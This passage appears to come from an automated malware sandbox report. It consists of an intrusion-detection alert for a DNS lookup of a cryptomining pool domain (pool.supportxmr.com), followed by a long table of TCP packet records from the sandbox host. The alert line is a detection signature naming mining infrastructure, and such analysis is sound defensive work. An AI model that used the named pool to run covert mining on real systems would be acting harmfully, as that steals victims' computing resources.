2024-09-21T21:26:23.428329+0200	2047928	ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)	2	192.168.2.23	60473	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 21:26:00.923624039 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:00.923710108 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:00.923770905 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:00.929315090 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:00.929344893 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:01.404134035 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:01.404530048 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:01.408337116 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:01.408365965 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:01.411055088 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:01.411067963 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:01.413064957 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:01.413131952 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.382746935 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.383065939 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:02.383132935 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.383157015 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:02.383217096 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.390665054 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.435478926 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:02.519310951 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:02.519545078 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:02.519553900 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.526356936 CEST	40456	443	192.168.2.23	104.26.12.205
Sep 21, 2024 21:26:02.526431084 CEST	443	40456	104.26.12.205	192.168.2.23
Sep 21, 2024 21:26:03.734087944 CEST	42836	443	192.168.2.23	91.189.91.43
Sep 21, 2024 21:26:04.757833004 CEST	42516	80	192.168.2.23	109.202.202.202
Sep 21, 2024 21:26:12.921310902 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:12.921396971 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:12.921453953 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:12.923289061 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:12.923324108 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.612710953 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.613074064 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.616054058 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.616080999 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.618596077 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.618608952 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.620157957 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.620214939 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.625014067 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.625097990 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.625157118 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.625170946 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:13.625227928 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.630362034 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:13.671436071 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.047579050 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.047709942 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:14.048209906 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.048265934 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:14.048785925 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.048835039 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:14.048924923 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.052117109 CEST	60334	443	192.168.2.23	140.82.121.3
Sep 21, 2024 21:26:14.052165985 CEST	443	60334	140.82.121.3	192.168.2.23
Sep 21, 2024 21:26:14.074032068 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.074081898 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.074151039 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.079149961 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.079181910 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.633100033 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.633280039 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.636465073 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.636482000 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.639092922 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.639103889 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.640645027 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.640722036 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.645544052 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.645628929 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.645669937 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.645683050 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.645728111 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.648794889 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.695426941 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.792108059 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.792311907 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.792535067 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.792587996 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.794105053 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.794148922 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.794161081 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.794194937 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.794213057 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.794254065 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.795209885 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.795245886 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.795999050 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.796041012 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.796083927 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.796120882 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.797357082 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.798165083 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.800201893 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.800215960 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.801069021 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.811418056 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.815351009 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.884507895 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.885319948 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.885377884 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.885413885 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.885895967 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.886940956 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.886992931 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.887866974 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.887881994 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.889298916 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.889386892 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.890268087 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.890348911 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.891650915 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.891733885 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.893495083 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.894535065 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.899960995 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.899981022 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.907850981 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.950886965 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.976334095 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.976387978 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.976409912 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.977771044 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.977844000 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.979175091 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.979252100 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.980777979 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.980861902 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.981930017 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.982012987 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.986434937 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.986469984 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.992693901 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.992733002 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.997515917 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:14.999098063 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:14.999115944 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.002490997 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.002531052 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.008531094 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.008543968 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.047681093 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.072065115 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.072084904 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.072125912 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.072127104 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.072148085 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.072175980 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.072199106 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.072221994 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.077541113 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.077579975 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.077595949 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.077610016 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.077833891 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.083070993 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.083111048 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.087019920 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.087033033 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.089113951 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.089158058 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.094875097 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.094913960 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.098536968 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.098553896 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.100222111 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.100269079 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.107424974 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.107439995 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.107491016 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.107656956 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.107697010 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.107703924 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.107724905 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.117048979 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.161978960 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.162024021 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.162048101 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.162072897 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.162096977 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.162116051 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.168503046 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.168541908 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.168557882 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.168570042 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.175736904 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.175781965 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.176850080 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.176863909 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.179347038 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.179399967 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.182756901 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.182800055 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.186909914 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.186925888 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.188018084 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.188065052 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.192897081 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.192939997 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.195902109 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.195916891 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.222999096 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.229248047 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.229281902 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.229299068 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.229310989 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.230909109 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.253463984 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.253516912 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.253534079 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.253545046 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.254821062 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.257745028 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.257796049 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.257797003 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.257819891 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.261226892 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.261272907 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.264755964 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.264795065 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.266002893 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.266020060 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.268013000 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.268066883 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.270560980 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.270596981 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.274490118 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.274535894 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.275226116 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.275243044 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.305268049 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.329077959 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.329119921 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.329138041 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.329150915 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.330687046 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.354471922 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.354513884 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.354535103 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.354549885 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.355854988 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.356376886 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.356414080 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.356421947 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.356436014 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.359813929 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.359858990 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.363254070 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.363308907 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.366693974 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.366718054 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.374614000 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.374674082 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.376101971 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.376115084 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.381618023 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.381654978 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.384052038 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.384094000 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.385900974 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.385927916 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.391535044 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.391571045 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.406639099 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.435714960 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.435774088 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.435802937 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.435827971 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.437190056 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.445127010 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.445166111 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.445177078 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.445190907 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.448430061 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.448477983 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.449631929 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.449650049 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.451761961 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.451798916 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.454530001 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.454575062 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.457194090 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.457230091 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.459939957 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.459984064 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.460688114 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.460716963 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.462347984 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.462383986 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.470304012 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.470319986 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.507842064 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.530585051 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.530641079 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.530651093 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.530668974 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.532314062 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.544517994 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.544558048 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.544569969 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.544586897 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.545671940 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.552274942 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.552325964 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.552341938 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.552354097 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.555710077 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.555757999 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.555795908 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.555809021 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.559614897 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.559653044 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.563369989 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.563436031 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.564973116 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.564990044 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.571132898 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.571170092 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.574069023 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.574084044 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.575481892 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.575535059 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.583087921 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.583101988 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.601368904 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.624859095 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.624912024 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:15.624922991 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:15.624941111 CEST	443	32840	185.199.111.133	192.168.2.23
